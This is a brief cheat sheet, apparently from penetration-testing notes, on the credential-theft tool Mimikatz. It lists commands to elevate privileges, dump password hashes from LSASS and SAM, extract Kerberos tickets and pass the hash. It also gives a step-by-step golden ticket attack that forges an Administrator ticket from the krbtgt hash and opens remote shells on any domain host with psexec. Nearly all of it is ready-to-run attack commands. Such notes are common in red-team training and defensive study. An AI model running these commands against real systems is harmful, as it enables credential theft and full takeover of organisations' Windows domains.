Mimikatz
Overview
https://github.com/gentilkiwi/mimikatz
There are various spin-offs of the Mimikatz project, including a PowerShell variety. Mimkatz is primarily used to dump hashes from LSASS, pass hashes, or generating Kerberos tickets for use in attacks.
General Usage
Elevate to Highest Integrity Level
C:\ > mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
Dump Hashes in LSASS
mimikatz # sekurlsa::logonpasswords
Dump SAM
mimikatz # lsadump::sam
Dump Cached TGTs
mimikatz # sekurlsa::tickets
Overpass the Hash
Create a TGT using a dumpled NTLM hash
mimikatz # sekurlsa::pth /user:username /ntlm:hash-here /domain:domain.tld
Golden Ticket Attack
If an attacker runs mimikatz
on a domain controller, they can access the Kerberos hash of the krbtgt
account and arbitrarily create tickets for themselves to access any resource on the network.
C:\ > mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt
- Copy the domain SID
- Copy the NTLM hash of the
krbtgt
account
mimikatz # kerberos::golden /User:Administrator /domain:domain.tld /sid:<domain_sid> /krbtgt:<krbtgt_ntlm_hash> /id:500 /ptt
mimikatz # misc::cmd
Now, a command prompt is running with the golden ticket we created
C:\ > psexec.exe \\hostname cmd.exe
This enables an attacker to open a remote command prompt on any host in the domain, due to the availability of a golden ticket.